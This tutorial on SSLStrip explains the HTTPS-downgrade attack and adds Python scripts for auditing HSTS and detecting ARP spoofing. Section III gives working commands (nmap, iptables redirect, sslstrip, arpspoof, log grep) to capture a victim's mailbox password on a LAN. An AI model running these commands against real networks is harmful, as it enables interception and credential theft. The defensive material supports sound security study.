This article discusses the security of SSL encryption; the author accepts no responsibility for any actions readers take using the methods and tools described here.
I. What is SSL?
SSL is short for Secure Sockets Layer, a protocol developed by Netscape to secure data transmitted over the Internet so that it cannot be intercepted or eavesdropped on while in transit.
SSL 3.0 is the popular version. It is widely used for identity authentication and encrypted data transmission between web browsers and servers.
SSL provides the following services:
(1) Authenticating users and servers, ensuring that data is sent to the correct client and server.
(2) Encrypting data to prevent it from being stolen in transit.
(3) Maintaining data integrity, ensuring that data is not altered during transmission.
II. About SSLStrip
The working principle of SSLStrip, step by step:
(1) First, carry out a man-in-the-middle attack so that the victim's HTTP traffic can be intercepted.
(2) Replace every HTTPS link in that traffic with an HTTP link, and keep a record of each link that was changed.
(3) Talk to the victim machine over plain HTTP.
(4) At the same time, establish an HTTPS connection to the legitimate server.
(5) Proxy all communication between the victim and the legitimate server.
(6) The site's icon is replaced with the familiar "yellow lock" icon, so the page still looks secure to the victim.
(7) In this way the man-in-the-middle captures passwords, account names and other information.
SSLStrip's official download address is http://www.thoughtcrime.org/software/sslstrip/. Currently only a Linux version of SSLStrip is available. The tool is written in Python and requires a Python environment; download and install it first.
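The downgrade described above only works when nothing tells the browser that the site must be reached over HTTPS. The Python script below is an added example, not part of the original article or of SSLStrip itself: it audits a captured HTTP response for the conditions that make link stripping possible, namely a missing or weak Strict-Transport-Security (HSTS) header, http:// links in the page body, and a login form whose action is not HTTPS. The two response dictionaries, the host name mail.example.test and the finding codes are constructed for the example.

```python
import re
from urllib.parse import urlparse

# One year in seconds: the minimum max-age that browser preload lists accept,
# and a sensible floor for any site that serves logins.
HSTS_MIN_AGE = 31536000

# Constructed sample responses (not taken from the original article).
# SECURE_RESPONSE is what a well-configured HTTPS origin returns to the browser;
# STRIPPED_RESPONSE is what the browser sees once a link-stripping proxy has
# downgraded the connection and rewritten every https:// link to http://.
SECURE_RESPONSE = {
    "url": "https://mail.example.test/login",
    "headers": {
        "Strict-Transport-Security": "max-age=31536000; includeSubDomains",
        "Content-Type": "text/html; charset=utf-8",
    },
    "body": (
        '<form action="https://mail.example.test/login" method="post">'
        '<input name="user"><input name="pass" type="password"></form>'
        '<a href="https://mail.example.test/help">help</a>'
    ),
}

STRIPPED_RESPONSE = {
    "url": "http://mail.example.test/login",
    "headers": {"Content-Type": "text/html; charset=utf-8"},
    "body": (
        '<form action="http://mail.example.test/login" method="post">'
        '<input name="user"><input name="pass" type="password"></form>'
        '<a href="http://mail.example.test/help">help</a>'
        '<link rel="icon" href="http://mail.example.test/lock.ico">'
    ),
}

# href="..." and action="..." attribute values, in document order.
_ATTR_URL = re.compile(r'\b(?:href|action)\s*=\s*"([^"]+)"', re.IGNORECASE)
# A <form> whose action is captured and whose body contains a password field.
_PASSWORD_FORM = re.compile(
    r'<form[^>]*\baction\s*=\s*"([^"]+)"[^>]*>(?:(?!</form>).)*?type\s*=\s*"password"',
    re.IGNORECASE | re.DOTALL,
)


def _header(headers, name):
    """Case-insensitive header lookup; HTTP header names are not case-sensitive."""
    for key, value in headers.items():
        if key.lower() == name.lower():
            return value
    return None


def parse_hsts(value):
    """Parse a Strict-Transport-Security value into (max_age, include_subdomains).

    Returns None when the header is absent or its max-age is missing or malformed,
    which a browser treats as no policy at all.
    """
    if value is None:
        return None
    max_age, include_sub = None, False
    for directive in value.split(";"):
        name, _, val = directive.strip().partition("=")
        name = name.strip().lower()
        if name == "max-age":
            try:
                max_age = int(val.strip().strip('"'))
            except ValueError:
                return None
        elif name == "includesubdomains":
            include_sub = True
    if max_age is None:
        return None
    return max_age, include_sub


def audit_response(response):
    """Return finding codes describing why this page is exposed to link stripping.

    An empty list means: served over HTTPS, strong HSTS policy, no http:// links,
    and any password form posts to an https:// action.
    """
    findings = []
    if urlparse(response["url"]).scheme.lower() != "https":
        findings.append("page-served-over-http")

    hsts = parse_hsts(_header(response["headers"], "Strict-Transport-Security"))
    if hsts is None:
        findings.append("no-hsts")
    else:
        max_age, include_sub = hsts
        if max_age < HSTS_MIN_AGE:
            findings.append("hsts-max-age-too-short")
        if not include_sub:
            findings.append("hsts-without-includesubdomains")

    for url in _ATTR_URL.findall(response["body"]):
        if urlparse(url).scheme.lower() == "http":
            findings.append("http-link:" + url)

    for action in _PASSWORD_FORM.findall(response["body"]):
        if urlparse(action).scheme.lower() != "https":
            findings.append("password-form-posts-over-http")
    return findings


if __name__ == "__main__":
    for label, sample in (("secure", SECURE_RESPONSE), ("stripped", STRIPPED_RESPONSE)):
        print(label, audit_response(sample) or ["ok"])
```

HSTS is the standard browser-side defence against this kind of downgrade: once a browser has seen the header from a site it rewrites http:// requests for that site to https:// on its own and refuses to continue if the certificate fails validation, so a proxy that has downgraded the connection has nothing left to rewrite. A page served over plain HTTP cannot set HSTS for itself, which is why the stripped sample reports "no-hsts" alongside the rewritten links and the password form posting over HTTP.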
III. SSLStrip attack operations (the example below uses 192.168.1.33 as the IP address of the targeted user, and the account being captured is the 126 mailbox password of the user test)
Step 1:
Use nmap to scan for live hosts on the internal network and identify the attack target
nmap -sP 192.168.1.0/24
Parameter description:
-sP: ICMP host discovery, that is, a ping scan.
Step 2:
Put the attacking machine into forwarding mode (enable IP forwarding in the kernel)
echo "1" > /proc/sys/net/ipv4/ip_forward
Step 3:
Add an iptables rule that redirects all HTTP traffic to sslstrip.
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 9527
or
iptables -t nat -A PREROUTING -p tcp --dport 80 -j REDIRECT --to-port 9527
Parameter description:
-t: the table the command operates on (here the nat table).
-A: append the rule to the end of the selected chain.
-p: the protocol to match.
--destination-port or --dport: the destination port to match.
-j: the target to jump to when the rule matches.
Step 4:
Start SSLStrip
python ./sslstrip.py -a -l 9527 -w pojie.log
Parameter description:
-a: log all SSL and HTTP traffic to and from the server.
-l: the listening port; it must match the port set in the iptables rule.
-w: write the intercepted content to the given file.
Step 5:
Launch the man-in-the-middle attack
arpspoof -i eth0 -t 192.168.1.33 192.168.1.1
Parameter description:
-i eth0: the network interface to work on.
-t: the target IP address, followed by the gateway IP address that is spoofed.
Step 6:
View the account information in the pojie.log file generated by SSLStrip
cat pojie.log | grep test
Search pojie.log for lines containing the account name test to find the password of the user test.
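On the defending side, the ARP spoofing in step 5 is visible on the wire: the attacking machine keeps sending ARP replies that claim the gateway's IP address with its own MAC address. The following Python script is an added example, not from the original article or from the tools it uses, showing how a passive sensor on the LAN segment can flag that traffic from a list of ARP reply records. The KNOWN_HOSTS table, the reply records and all MAC addresses are constructed for the example; the addresses 192.168.1.1 and 192.168.1.33 are the gateway and target from the walkthrough.

```python
from collections import defaultdict

# Trusted IP-to-MAC table for the hosts that matter, as a defender would record
# it on a quiet network (constructed values; the gateway and target IPs are the
# ones used in the walkthrough above).
KNOWN_HOSTS = {
    "192.168.1.1": "00:11:22:33:44:01",   # gateway
    "192.168.1.33": "00:11:22:33:44:33",  # the workstation being protected
}

# Constructed ARP reply records as (sender_ip, sender_mac, target_ip), in the
# order a passive sensor on the segment would see them.
ARP_REPLIES = [
    ("192.168.1.1", "00:11:22:33:44:01", "192.168.1.33"),   # legitimate gateway reply
    ("192.168.1.50", "00:11:22:33:44:50", "192.168.1.1"),   # host not in the table, first sighting
    ("192.168.1.1", "de:ad:be:ef:00:01", "192.168.1.33"),   # another MAC claims the gateway IP
    ("192.168.1.1", "de:ad:be:ef:00:01", "192.168.1.33"),   # repeated a couple of seconds later
    ("192.168.1.33", "de:ad:be:ef:00:01", "192.168.1.1"),   # same MAC now also claims the target
]


def detect_arp_spoof(known_hosts, replies):
    """Return alert strings for ARP replies that contradict the known mapping.

    Hosts absent from known_hosts are trusted on first use. A second alert type
    fires for any MAC that ends up claiming more than one IP address.
    """
    seen = {ip: mac.lower() for ip, mac in known_hosts.items()}  # ip -> mac
    conflicts = {}                    # (ip, mac) -> number of contradicting replies
    ips_per_mac = defaultdict(set)    # mac -> set of IPs it has claimed

    for sender_ip, sender_mac, _target_ip in replies:
        sender_mac = sender_mac.lower()
        expected = seen.get(sender_ip)
        if expected is None:
            seen[sender_ip] = sender_mac
        elif expected != sender_mac:
            conflicts[(sender_ip, sender_mac)] = conflicts.get((sender_ip, sender_mac), 0) + 1
        ips_per_mac[sender_mac].add(sender_ip)

    alerts = []
    for (ip, mac), count in conflicts.items():
        alerts.append(
            f"ip-mac-conflict: {ip} claimed by {mac}, expected {seen[ip]}, {count} reply(s)"
        )
    for mac, ips in ips_per_mac.items():
        if len(ips) > 1:
            alerts.append(f"mac-claims-multiple-ips: {mac} -> {sorted(ips)}")
    return alerts


if __name__ == "__main__":
    for alert in detect_arp_spoof(KNOWN_HOSTS, ARP_REPLIES):
        print(alert)
```

Two heuristics are combined: a conflict between the MAC a reply announces for an IP and the MAC in the trusted table (or the first MAC seen, for hosts not in the table), and a single MAC that ends up claiming more than one IP, which is what happens when an attacker impersonates both ends of a conversation. Repeated contradicting replies are counted rather than reported one by one, since the spoofing tool resends them continuously. Static ARP entries for the gateway on critical hosts, and Dynamic ARP Inspection on managed switches, prevent the poisoning rather than merely detecting it.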